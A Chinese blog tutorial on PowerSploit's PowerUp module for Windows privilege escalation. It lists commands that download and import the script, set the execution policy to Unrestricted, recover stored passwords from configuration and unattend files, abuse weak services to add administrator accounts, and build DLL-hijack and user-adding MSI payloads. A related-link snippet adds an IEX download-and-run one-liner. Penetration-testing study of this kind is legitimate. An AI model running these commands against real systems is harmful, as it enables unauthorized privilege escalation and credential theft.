PowerUp攻击模块

最新推荐文章于 2024-08-23 07:37:44 发布
最新推荐文章于 2024-08-23 07:37:44 发布
阅读量920 收藏 1
点赞数
文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46104215/article/details/121217280
版权

        poweUp 是 Privesc 模块下的脚本,拥有众多用来寻找目标主机 Windows 服务漏洞进行提权的实用脚本

        通常,在 Windows 下可以通过内核漏洞来提升权限,但是,可能会碰到无法通过内核漏洞提权所处服务器的情况,这个时候就需要利用脆弱的 Windows 服务提权,或者利用常见的系统服务,通过其继承的系统权限来完成提权等,此框架可以在内核提权不行的时候,帮助寻找服务器的弱点,进而通过脆弱点实现提权的目的

准备

下载 PowerUp.ps1 到目标主机,然后命令 import-module 导入模块

(New-Object Net.WebClient).DownloadFile("http://192.168.110.130/PowerSploit/Privesc/PowerUp.ps1","E:\PowerUp.ps1")
import-module .\PowerUp.ps1

(导入模块可能会出现错误,权限不足,脚本运行设置为 unRestricted)

Get-ExecutionPolicy
Set-ExecutionPolicy unRestricted

输入命令可以通过 Tab 键来自动补全,如果要查看各个模块的详细说明,可以输入 get-help [cmdlet](模块名称) -full

get-Help Invoke-AllChecks -full

1.Invoke-AllChecks

自动执行 PowerUp下所有的脚本来检查目标主机

Check:检查出来的问题         AbuseFunction:可以利用的模块

2.Find-Pathdllhijack

检查当前 %PATH%的哪些目录是用户可以写入的(检查系统可写目录)

3.Get-ApplicationHost

Get-ApplicationHost
Get-ApplicationHost | Format-Table -Autosize    //列表显示

利用系统上的 applicationHost.config 文件恢复加密过的应用池和虚拟目录的密码

 

4.Get-RegistryAlwaysInstallElevated

检查 AlwaysInstallElevated 注册表项是否被设置,如果已被设置,意味着 MSI 文件是以 SYSTEM权限执行的

5.Get-RegistryAutoLogon

检查 Winlogin 注册表中的 AutoAdminLogon 项有没有被设置,可查询默认的用户名和密码

6.Get-ServiceDetail

返回某服务的信息

Get-ServiceDetail -ServiceName Dhcp

7.Test-ServiceDaclPermission

检查所有可用的服务,并尝试对这些打开的服务进行修改,如果可修改,则返回该服务对象

8.Get-UnattendedInstallFile

检查一些路径,查找是否存在这些文件,因为这些文件中可能含有部署凭据

  • c:\sysprep\sysprep.xml
  • c:\sysprep\sysprep.inf
  • c:\sysprep.inf
  • c:\windows\Panther\Unattended.xml
  • c:\windows\Panther\Unattend\Unattended.xml
  • c:\windows\Panther\Unattend.xml
  • c:\windows\Panther\Unattend\Unattend.xml
  • c:\windows\System32\Sysprep\unattend.xml
  • c:\windows\System32\Sysprep\Panther\unattend.xml

9.Get-ModifiableRegistryAutoRun

检查开机自启的应用程序路径和注册表键值,然后返回当前用户可修改的程序路径

10.Get-ModifiableScheduledTaskFile

返回当前用户能够修改的计划任务程序的名称和路径,被检查的注册表键值如下:

  • HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  • HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
  • HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
  • HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce
  • HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunService
  • HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceService
  • HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunService
  • HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnceService

11.Get-Webconfig

返回当前服务器上 web.config 文件中的数据库连接字符串的明文

 

12.Invoke-ServiceAbuse

Invoke-ServiceAbuse -ServiceName XXXX    //添加默认账户
Invoke-ServiceAbuse -ServiceName XXXX -Username "域名\用户名称"    //指定添加的域账户
Invoke-ServiceAbuse -ServiceName XXXX -Username XXXX -Password XXXX -LocalGroup "XXX" 
//添加指定用户,用户密码以及添加的用户组
Invoke-ServiceAbuse -ServiceName XXXX -Command "net..."    //自定义执行命令

13.Restore-ServiceBinary

恢复服务的可执行文件到原始目录

Restore-ServiceBinary -ServiceName XXXX

14.Test-ServiceDaclPermission

检查某个用户是否在服务中有自由访问控制的权限,结果会返回 True 或 False

Test-ServiceDaclPermission -ServiceName XXX

15.Write-HijackDll

输出一个自定义命令并且能够自我删除的 bat 文件到 $env:Temp\debug.bat,并输出一个能够启动这个 bat 文件的 DLL

16.Write-UserAddMSI

生成一个安装文件,运行这个安装文件后会弹出添加用户的对话框

Write-UserAddMSI

 

17.Write-ServiceBinary

用于预编译 C# 服务的可执行文件,默认创建一个管理员账户,通过 Command 定制自己的命令

Write-ServiceBinary -ServiceName XXXX    //添加默认账户
Write-ServiceBinary -ServiceName XXXX -Username "域名\用户名称"    //指定添加的域账户
Write-ServiceBinary -ServiceName XXXX -Username XXXX -Password XXXX -LocalGroup "XXX" 
//添加指定用户,用户密码以及添加的用户组
Write-ServiceBinary -ServiceName XXXX -Command "net..."    //自定义执行命令

18.Install-ServiceBinary

写一个 C# 的服务用来添加用户

Install-ServiceBinary -ServiceName XXXX    //添加默认账户
Install-ServiceBinary -ServiceName XXXX -Username "域名\用户名称"    //指定添加的域账户
Install-ServiceBinary -ServiceName XXXX -Username XXXX -Password XXXX -LocalGroup "XXX" 
//添加指定用户,用户密码以及添加的用户组
Install-ServiceBinary -ServiceName XXXX -Command "net..."    //自定义执行命令

Write-ServiceBinary 与 Install-ServiceBinary 不同:前者生成可执行文件,后者直接安装服务

橙汁水
关注
PowerUp攻击模块实战
weixin_41082546的博客
10-22 759
PowerUp攻击模块实战演练 1.将PowerUp.ps1脚本上传至目标服务器,然后在本地执行 2.使用IEX在内存中加载此脚本,执行以下命令,脚本将进行所有的检查。 powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('C:\PowerUp.ps1'); Invoke-A...
PowerUpSQL.ps1脚本的使用方法与编程实例
ScriptCharm的博客
08-13 389
该脚本提供了多种SQL Server渗透测试和安全评估功能,可以帮助检测数据库中的潜在漏洞,如权限提升、注入攻击、敏感数据泄露等。本文介绍了PowerUpSQL脚本的使用方法和编程实例,希望能够帮助读者更好地了解和应用该工具,提高数据库安全性,并加强对数据库漏洞的发现和利用能力。在上述代码中,我们首先导入PowerUpSQL脚本模块,然后使用不同的命令对目标数据库进行扫描、权限检查、注入漏洞检测和敏感数据查找。通过指定适当的参数,可以灵活地配置脚本的行为,以满足具体的需求。下面介绍几个常用的使用方法。
PowerUp 开源项目教程
最新发布
gitblog_00483的博客
08-23 766
PowerUp 开源项目教程 PowerUpThis version of PowerUp is now unsupported. See https://github.com/Veil-Framework/PowerTools/tree/master/PowerUp for the most current version.项目地址:https://gitcode.com/gh_mirrors...
PowerSploit脚本的应用:强大的攻击渗透测试工具
CodeNexus的博客
08-13 141
PowerSploit是一款功能强大的渗透测试工具,提供了多个模块和脚本,可用于执行各种攻击技术。在本文中,我们介绍了几个常用的PowerSploit模块,并提供了相应的源代码示例。然而,需要强调的是,PowerSploit是一个专业的安全工具,只能在合法授权和合规的情况下使用,任何未经授权的攻击行为都是违法的。对于安全从业人员来说,了解和熟悉这类工具的用法可以帮助其更好地理解攻击技术,并提供相应的防御措施。本文将介绍PowerSploit的几个常用模块,并提供相应的源代码示例。
powershell渗透基础
qq_46804551的博客
04-30 1312
一旦攻击者可以在一台计算机上运行代码,就会下载powershell脚本文件(.ps1)到磁盘中 执行,甚至无需写到磁盘中执行,它可以直接在内存中运行,利用诸多特点攻击者可以持续攻击而不被轻易发现。 常用的powershell攻击工具有以下几种: powerSploit: 常用于信息探测,权限提升,凭证窃取,持久化等操作 Nishang: 基于powershell的渗透测试专用工具,集成了框架,脚本和各种payload,包含下载和执行,键盘记录,DNS,延时命令等脚本 Empire: 基于powe
Powershell攻击指南1——PowerSploit
willow_liang的博客
12-05 1614
1.1PowerShell技术 灵活且能功能化管理Windows系统,一旦攻击者可以在计算机上执行代码,就可下载powershell脚本(.ps1)到磁盘中执行,甚至可以直接在内存中执行。 常用的powershell攻击工具: PowerSploit: 这是众多owehShe攻击工具中被广泛使用的PoweShel后期漏洞利用框架,常用于信息探测、特权提升、凭证窃取、持久化等操作。 Nishang:基于PowerShell的渗透测试专用工具,集成了框架、脚本和各种Payload,包含下载和执行、键盘记
实训笔记2.0
qq_65745696的博客
03-24 887
CSRF漏洞介绍 CSRF (Cross--site request forgery,跨站请求伪造))也被称为 One Click Attack 或者 Session Riding,通常缩写为 CSRF 或者 XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与 XSS 非常不同,XSS 利用站点内的信任用户,而 CSRF 则通过伪装成受信任用户请求受信任的网站。与 XSS 攻击相比,CSRF 攻击往往不大流行(因此对其进行防范的资源也相当稀少)也难以防范,所以被认为比 XSS 更具危
网络安全渗透
李子木的博客
04-04 8634
Sqlmap简介 sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试神器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。 支持的数据库:MySQL,Oracle, PostgreSQL, SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB。 Sqlmap安装 (1)安装sqlmap前,需要.
windows系统权限提升
weixin_53639243的博客
04-23 3303
提权方法。
PowerUpSQL.ps1脚本的使用方法
DevSavantX的博客
09-09 169
PowerUpSQL.ps1脚本是一种强大的工具,可用于自动化SQL服务器渗透测试和权限提升。本文提供了关于PowerUpSQL.ps1脚本的用法说明,并给出了一些示例代码。请记住,在使用这样的工具时,要遵循道德准则,仅在合法的环境中进行测试和使用。PowerUpSQL.ps1脚本是一种用于自动化SQL服务器渗透测试和权限提升的工具。本文将介绍PowerUpSQL.ps1脚本的用法,并提供相应的源代码示例。在使用PowerUpSQL.ps1脚本之前,你需要配置一些参数。以显示详细的输出信息,或将。
PowerUpSQL.ps1脚本的用法
谢公子的博客
12-06 2066
PowerUpSQL PowerUpSQL是为攻击SQLServer而设计的具有攻击性的PowerShell脚本。PowerUpSQL包括支持SQLServer发现、弱配置审核、权限升级和利用后操作(如OS命令执行)的功能,它常用于内网渗透。PowerUpSQL还包括许多功能,管理员可以使用这些功能快速地在ADS域中清点SQL服务器,并执行与SQLServer相关的常见威胁查找任务。项目地址:h...
内网渗透测试基础——Windows PowerShell篇
Liu_Bruce的博客
12-16 703
Windows PowerShell是一种命令行外壳程序和脚本环境,它内置在每个受支持的Windows版本中(Windows7、Windows Server 2008 R2及更高版本),为Windows命令行使用者和脚本编写者利用.NET Framework的强大功能提供了便利。只要可以在一台计算机上运行代码,就可将PowerShell脚本文件(.ps1)下载到磁盘中执行(甚至无须将脚本文件写到磁盘中)。也可以把PowerShell看作命令提示符cmd.exe的扩展。
内网渗透-----权限分析及防御
qq_43590351的博客
10-20 3172
内网权限提升及防御
PowerUp攻击模块讲解
bring_coco的博客
01-25 1169
PowerUp是Privesc模块下的一个脚本,功能相当强大,拥有众多用来寻找目标主机Windows服务漏洞进行提权的实用脚本 通常,在Windows下可以通过内核漏洞来提升权限,但是,我们常常会碰到无法通过内核漏洞提权所处服务器的情况,这个时候就需要利用脆弱的Windows服务提权,或者利用常见的系统服务,通过其继承的系统权限来完成提权等,此框架可以在内核提权行不通的时候,帮助我们寻找服务器的脆弱点,进而通过脆弱点实现提权的目的。 PowerUp下的模块: 1.Invoke-AllChecks 该模块会自
执行PowerUp.psl脚本时,powershell报错“在此系统中禁止执行脚本”
u013930899的博客
05-10 782
1. 问题描述 在实验PowerUp.psl功能时,导入PowerUp.psl脚本报错如下: Import-Module : 无法加载文件 C:\PowerUp.ps1,因为在此系统中禁止执行脚本。有关详细信息,请参阅 "get-help about_signing"。 所在位置 行:1 字符: 14 + Import-Module <<<< C:\PowerUp.ps1 + ...
PowerShell工具之Powerup详解实录
冰河的专栏
01-08 6675
0×01. Powerup简介 Powerup是本地特权提升的一些调用方法,功能相当强大,拥有众多实用的脚本来帮助我们寻找目标主机Windows服务漏洞进行提权,也是 PowerShell Empire和PowerSploit 的一部分。 通常,在Windows下面我们可以通过内核漏洞来提升权限,但是,我们常常会碰到所处服务器通过内核漏洞提权是行不通的,这个时候,我们就需要通过脆弱的Windo...
PowerBuilder报告模块开发与应用
资源摘要信息: "PowerBuilder 报告模块" 在深入解析压缩包 Rpt_Admin.rar 中的 PowerBuilder 报告模块之前,需要先了解 PowerBuilder 这一强大的应用程序开发工具。PowerBuilder 是由 Sybase 公司开发的一套用于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值